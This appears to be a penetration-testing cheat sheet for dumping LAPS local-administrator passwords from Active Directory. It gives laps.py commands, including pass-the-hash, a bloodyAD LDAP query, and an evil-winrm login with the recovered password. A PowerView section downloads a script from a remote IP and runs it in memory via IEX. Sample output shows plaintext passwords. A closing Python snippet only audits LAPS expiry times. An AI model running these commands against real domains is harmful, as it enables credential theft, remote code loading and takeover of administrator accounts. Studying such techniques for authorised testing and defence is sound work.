# LAPS

* Dump LAPS passwords once you hold an account that has the right to read them
* Enumerate the users that can read LAPS passwords with BloodHound

### lapsdumper.py

Usage:

Basic:

`$ python laps.py -u user -p password -d domain.local`

Pass the Hash, specific LDAP server:

`$ python laps.py -u user -p e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c -d domain.local -l dc01.domain.local`

### bloodyAD

If BloodHound shows the user can read LAPS passwords, query `ms-Mcs-AdmPwd` and `ms-Mcs-AdmPwdExpirationTime` directly:

```bash
bloodyAD --host DC_IP -d domain.local -u user -p 'PASSWORD' \
  get search \
  --filter '(ms-mcs-admpwdexpirationtime=*)' \
  --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
```

Example output:

```
distinguishedName: CN=DC01,OU=Domain Controllers,DC=domain,DC=local
ms-Mcs-AdmPwd: V,!31D;3&M+2h.
ms-Mcs-AdmPwdExpirationTime: 134260119643091883
```

Use the recovered local Administrator password with WinRM if the target permits it:

```bash
evil-winrm -i DC_IP -u Administrator -p 'V,!31D;3&M+2h.'
```

### PowerView Dump

* Download PowerSploit

```
https://github.com/PowerShellMafia/PowerSploit/tree/dev
```

* Zip the directory up and transfer the whole archive to the target
* Expand it on the target with `Expand-Archive`

```powershell
Import-Module .\PowerSploit.psd1
# --or-- load PowerView straight into memory
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.45/PowerView.ps1') | IEX
# Now it is loaded into memory, either via IEX or via Import-Module
$SecPassword = ConvertTo-SecureString 'PASSWORD_HERE' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('RLAB\ngodfrey_adm',$SecPassword)
Get-DomainComputer ws01,ws02,ws03,ws04,ws05,ws06 -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime -Credential $Cred
Get-DomainComputer ws02 -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime -Credential $Cred
```

Example output:

```
ms-mcs-admpwdexpirationtime ms-mcs-admpwd
--------------------------- -------------
ws01        133185858282921848 7Z74HKx6
ws02        133185858955408843 Khb3SL8p
ws03        133185859531299786 t25KAW60
ws04        133185860137129767 l0Q7i5Xd
ws05        133185860845564372 bzsn82zX
ws06        133185861369786402 vPKNz69a
```
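Both the bloodyAD and the PowerView output above carry `ms-Mcs-AdmPwdExpirationTime` as a raw Windows FILETIME. As an added example (not part of this page, bloodyAD or PowerView), the following Python converts those values to UTC and flags hosts whose LAPS rotation has lapsed or whose expiry sits further out than the policy age; the 30-day policy age, the `utc` helper and the sample rows (built from the output above, passwords redacted) are assumptions.

```python
import re
from datetime import datetime, timedelta, timezone

# ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def utc(year, month, day, hour=0, minute=0):
    """Helper so callers can build a UTC reference time without importing datetime."""
    return datetime(year, month, day, hour, minute, tzinfo=timezone.utc)

def filetime_to_datetime(ft):
    """Convert the raw LDAP integer to an aware UTC datetime (microsecond precision)."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)

# One row of the PowerView table above: <hostname> <expirationtime> <password>
ROW_RE = re.compile(r"^(\S+)\s+(\d{17,18})\s+(\S+)$")

def parse_laps_rows(text):
    """Map hostname -> expiry for every data row; header and rule lines are skipped.
    The password column is matched only to validate the row, then discarded."""
    expiry = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            expiry[m.group(1)] = filetime_to_datetime(int(m.group(2)))
    return expiry

def flag_rotation_problems(expiry, now, max_age_days=30):
    """Return {host: reason} for hosts whose expiry is already in the past
    (the LAPS client has not rotated) or lies further out than the policy
    maximum age (assumed 30 days here), which is worth investigating."""
    flagged = {}
    for host, when in expiry.items():
        if when < now:
            flagged[host] = "expired"
        elif when - now > timedelta(days=max_age_days):
            flagged[host] = "expiry beyond policy"
    return flagged

# Constructed sample: rows from the PowerView output above plus one row (dc01)
# carrying the expiration value shown in the bloodyAD output. Passwords redacted.
SAMPLE = """ms-mcs-admpwdexpirationtime ms-mcs-admpwd
--------------------------- -------------
ws01        133185858282921848 REDACTED
ws02        133185858955408843 REDACTED
ws06        133185861369786402 REDACTED
dc01        134260119643091883 REDACTED
"""
```

Run `flag_rotation_problems(parse_laps_rows(SAMPLE), utc(2023, 2, 1))` to see the workstation rows reported as expired and `dc01` reported as having an expiry beyond policy.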
